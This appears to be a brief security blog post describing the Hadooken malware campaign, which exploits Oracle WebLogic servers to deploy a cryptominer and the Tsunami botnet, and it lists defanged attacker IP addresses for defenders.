New Linux Malware Campaign

Cybersecurity researchers have uncovered a sophisticated new malware campaign targeting Linux environments, specifically the Oracle WebLogic server, to conduct illicit cryptocurrency mining and deploy botnet malware.

The campaign, detailed by cloud security firm Aqua, leverages known vulnerabilities and misconfigurations in the WebLogic server to deliver a malware strain dubbed Hadooken. Once executed, Hadooken drops the Tsunami malware and deploys a cryptocurrency miner, allowing attackers to profit from the victim’s computing resources.

The attack chain begins by exploiting vulnerabilities or weak credentials to gain initial access to vulnerable instances. The attackers then launch two nearly identical payloads, one written in Python and the other a shell script, both of which retrieve the Hadooken malware from a remote server.

The shell script version also attempts to gather SSH credentials and other sensitive information from the compromised system to facilitate lateral movement within the network. This enables the malware to spread to additional systems and expand the attackers’ reach.

Hadooken is equipped with two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet called Tsunami. The miner is used to generate cryptocurrency, while the botnet can be used to launch attacks against other systems.

To ensure persistence, Hadooken creates cron jobs to run the cryptocurrency miner periodically, making it difficult to remove.

The campaign is linked to two IP addresses: 89.185.85[.]102 and 185.174.136[.]204. Both addresses are associated with Aeza International LTD, a bulletproof hosting service provider with a history of hosting cybercriminal activities. Aeza has been implicated in previous campaigns involving the 8220 Gang and other cybercrime groups.

This new malware campaign highlights the ongoing threat posed by cybercriminals targeting Linux environments. Organizations must remain vigilant and implement robust security measures to protect their systems from such attacks.

If you are a customer of ours and use Oracle WebLogic Server, let us know if we can be of any assistance.